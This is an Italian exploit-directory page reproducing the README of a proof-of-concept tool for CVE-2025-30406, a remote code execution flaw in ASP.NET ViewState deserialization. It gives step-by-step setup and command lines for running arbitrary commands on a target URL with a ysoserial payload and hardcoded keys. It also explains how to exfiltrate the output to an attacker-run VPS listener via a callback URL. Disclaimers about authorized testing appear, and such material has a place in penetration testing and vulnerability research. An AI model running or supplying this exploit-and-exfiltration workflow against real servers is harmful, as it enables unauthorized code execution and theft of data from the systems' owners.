Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-30406 — CVE-2025-30406 ViewState Exploit PoC | Kitploit
Strumenti/GitHubGitHub/mchklt/cve-2025-30406
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubmchklt/cve-2025-30406

CVE-2025-30406

CVE-2025-30406 ViewState Exploit PoC

Vedi Repository
90181 anno faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-30406 PoC di Exploit ViewState

Panoramica

Questo è uno script Proof-of-Concept (PoC) che dimostra un exploit di deserializzazione ViewState per CVE-2025-30406 in applicazioni ASP.NET. Utilizza ysoserial per generare un payload ViewState dannoso e lo invia a un URL specificato dall'utente per eseguire un comando fornito. Per risultati ottimali, l'output del comando può essere esfiltrato verso un server HTTP personalizzato (server.py) in esecuzione su un VPS, che mostra i risultati in un formato stilizzato con timestamp, prompt verdi e testo di output bianco. Questo script è destinato esclusivamente a scopi educativi e deve essere utilizzato solo su sistemi per i quali si dispone di autorizzazione esplicita per eseguire test di sicurezza. L'uso non autorizzato è illegale e non etico.

Dettagli CVE

  • CVE ID: CVE-2025-30406
  • Descrizione: una vulnerabilità di deserializzazione nella gestione di ViewState in ASP.NET che consente l'esecuzione di codice remoto quando sono note una chiave di convalida e un generatore validi.
  • Sistemi interessati: applicazioni ASP.NET con configurazioni ViewState vulnerabili.
  • Prerequisiti per lo sfruttamento:
    • Accesso a una chiave di convalida e un generatore ViewState validi.
    • Un endpoint vulnerabile che accetta parametri ViewState.

Contenuti del Repository

  • exploit.py: lo script PoC principale per generare e inviare il payload ViewState.
  • server.py: un server HTTP per ricevere e visualizzare l'output del comando esfiltrato in un formato stilizzato.
  • README.md: questo file, con istruzioni di configurazione e utilizzo.

Prerequisiti

  • Python 3.x
  • Libreria requests (pip install requests)
  • Eseguibile ysoserial (Windows o equivalente per la tua piattaforma)
  • Un endpoint di applicazione ASP.NET vulnerabile
  • Un VPS o server per eseguire server.py (consigliato per l'esfiltrazione)
  • Autorizzazione per testare il sistema di destinazione

Installazione

  1. Clona questo repository:
    root@kitploit:~
    git clone https://github.com/yourusername/cve-2025-30406-poc.git
    cd cve-2025-30406-poc
    
  2. Installa il pacchetto Python richiesto:
    root@kitploit:~
    pip install requests
    
  3. Scarica ysoserial e posizionalo nella stessa directory di exploit.py o specifica il suo percorso:
    • ysoserial GitHub

Configurazione su un VPS (Consigliato)

Per ricevere l'output del comando esfiltrato in un formato stilizzato, esegui server.py su un VPS:

  1. Copia server.py sul tuo VPS (ad esempio tramite scp):
    root@kitploit:~
    scp server.py user@your-vps-ip:/home/user/
    
  2. Assicurati che Python 3 sia installato:
    root@kitploit:~
    sudo apt update && sudo apt install python3 python3-pip
    
  3. Esegui il server (porta predefinita 8000):
    root@kitploit:~
    python3 server.py
    
  4. Assicurati che il firewall del VPS consenta il traffico in entrata sulla porta 8000:
    root@kitploit:~
    sudo ufw allow 8000
    
  5. Prendi nota dell'IP pubblico o del dominio del VPS (ad esempio http://tuo-vps-ip:8000) da usare con il flag -e in exploit.py.

Utilizzo

Esecuzione dell'Exploit

Esegui exploit.py con gli argomenti richiesti. Il flag -e è opzionale ma fortemente consigliato per esfiltrare l'output del comando verso server.py per una visualizzazione stilizzata.

root@kitploit:~
python exploit.py -u <target_url> -c <command> [-y <ysoserial_path>] [-e <callback_url>]

Argomenti

  • -u, --url: URL di destinazione (es. http://target.com/page.aspx) [Obbligatorio]
  • -c, --command: Comando da eseguire (es. whoami) [Obbligatorio]
  • -y, --ysoserial: Percorso dell'eseguibile ysoserial (default: ./ysoserial.exe) [Opzionale]
  • -e, --exfil: URL di callback per esfiltrare l'output del comando (es. http://tuo-vps:8000) [Opzionale]

Esempi

  1. Esecuzione senza esfiltrazione (esecuzione cieca):
    root@kitploit:~
    python exploit.py -u http://example.com/loginpage.aspx -c "whoami" -y ./ysoserial.exe
    
  2. Esecuzione con esfiltrazione verso un VPS che esegue server.py (consigliato):
    root@kitploit:~
    python exploit.py -u http://example.com/loginpage.aspx -c "whoami" -y ./ysoserial.exe -e http://tuo-vps:8000
    

Esecuzione del Server

Sul tuo VPS o macchina locale, avvia il server HTTP per ricevere l'output esfiltrato:

root@kitploit:~
python3 server.py

Il server mostrerà l'output del comando con timestamp, un prompt $ verde e testo bianco per una migliore leggibilità.

Come Funziona

  1. Script di exploit (exploit.py):
    • Utilizza ysoserial con una chiave di convalida e un generatore hardcoded per creare un payload ViewState.
    • Se viene fornito -e, il comando viene avvolto per catturare l'output e inviarlo all'URL di callback tramite Invoke-WebRequest.
    • Invia il payload all'URL di destinazione in una richiesta POST, incorporato nel parametro __VIEWSTATE.
    • Stampa lo stato della risposta del server e una porzione del corpo della risposta.
  2. Server HTTP (server.py):
    • Ascolta le richieste GET contenenti l'output del comando.
    • Decodifica il percorso URL e lo divide in righe.
    • Stampa ogni riga con un timestamp, un prompt $ verde e un testo di output bianco.
    • Risponde con HTTP 200 e 'OK'.

Avviso sull'Uso Etico

  • Questo script è un proof-of-concept per CVE-2025-30406 per scopi educativi e di test di sicurezza autorizzati.
  • Non utilizzare questo script su sistemi senza esplicita autorizzazione del proprietario del sistema.
  • L'uso improprio può violare leggi, tra cui il Computer Fraud and Abuse Act (CFAA) negli Stati Uniti o leggi simili altrove.
  • Ottieni sempre il consenso scritto prima di testare qualsiasi sistema.
  • Segnala le vulnerabilità in modo responsabile attraverso la divulgazione coordinata o programmi di bug bounty.

Limitazioni

  • La chiave di convalida e il generatore hardcoded potrebbero funzionare solo per specifiche applicazioni vulnerabili. Gli utenti potrebbero aver bisogno di valori specifici dell'applicazione.
  • L'exploit prende di mira applicazioni ASP.NET vulnerabili alla deserializzazione ViewState.
  • Lo script presuppone che il server di destinazione elabori correttamente il payload ViewState.
  • La compatibilità multipiattaforma dipende dalla disponibilità di ysoserial (principalmente basato su Windows).
  • L'esfiltrazione richiede un server accessibile pubblicamente per l'URL di callback -e.

Licenza

Questo progetto è concesso in licenza con licenza MIT. Consulta il file LICENSE per i dettagli.

Contatti

Per domande o feedback, apri un problema (issue) su questo repository.

Scarica lo strumento